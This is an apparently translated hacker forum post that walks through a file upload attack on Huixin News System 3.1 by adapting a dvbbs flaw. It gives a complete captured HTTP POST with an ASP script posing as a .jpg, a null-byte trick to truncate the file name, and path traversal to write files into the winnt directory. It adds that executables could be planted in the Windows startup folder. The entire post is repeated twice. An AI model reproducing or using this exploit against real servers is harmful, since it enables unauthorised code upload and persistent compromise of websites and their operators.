Recently, everyone is very excited about the dvbbs file upload vulnerability. I wonder if it can be used in other systems? I will use the Huixin News System to attract attention!
Huixin News System 3.1 windows2000+sp4
Let’s look at this code first. admin_uploadfilesave.asp
...............
(formPath&)
............................
When saving, use path + file name + suffix name, then we can use the vulnerability on dvbbs, but we change the file name (because the system has a fixed path, if the path is changed, the upload will not be successful)
This is the data I captured:
POST /admin_uploadfilesave.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1/admin_uploadfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 658
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="act"
upload
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="upcount"
1
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="filepath"
newstxt/
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="file1"; filename="G:\ .jpg"
Content-Type: text/plain
<% language=vbscript %>
<ihihoiojpojppokkhhkhkhkhk
hkhjkjkjjlkkkkkk>
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="Submit"
submit
-----------------------------7d42cb1f101ae--
I changed the filename to + (space).jpg, and changed the length of content_length the same as dvbbs use, and then used the editor to modify the space hexadecimal 20 to 00, and the upload was successful! hehe!
Let’s look at the path we cannot change, so can we use.../../ to cut back? Just try it and you will know. Capture the data as above, and select name="filepath"
newsxt/ changed to: newstxt/../../winnt
content-length:658 Changed to: (658+14)672
OK, start uploading, haha! Discover the file under winnt. Then we can change the path to the Windows's self-start directory and upload exe, vbs, bat... files. However, all of the above must be further entered after obtaining the administrator of the news system.
Huixin News System 3.1 windows2000+sp4
Let’s look at this code first. admin_uploadfilesave.asp
...............
(formPath&)
............................
When saving, use path + file name + suffix name, then we can use the vulnerability on dvbbs, but we change the file name (because the system has a fixed path, if the path is changed, the upload will not be successful)
This is the data I captured:
POST /admin_uploadfilesave.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1/admin_uploadfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 658
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="act"
upload
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="upcount"
1
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="filepath"
newstxt/
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="file1"; filename="G:\ .jpg"
Content-Type: text/plain
<% language=vbscript %>
<ihihoiojpojppokkhhkhkhkhk
hkhjkjkjjlkkkkkk>
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="Submit"
submit
-----------------------------7d42cb1f101ae--
I changed the filename to + (space).jpg, and changed the length of content_length the same as dvbbs use, and then used the editor to modify the space hexadecimal 20 to 00, and the upload was successful! hehe!
Let’s look at the path we cannot change, so can we use.../../ to cut back? Just try it and you will know. Capture the data as above, and select name="filepath"
newsxt/ changed to: newstxt/../../winnt
content-length:658 Changed to: (658+14)672
OK, start uploading, haha! Discover the file under winnt. Then we can change the path to the Windows's self-start directory and upload exe, vbs, bat... files. However, all of the above must be further entered after obtaining the administrator of the news system.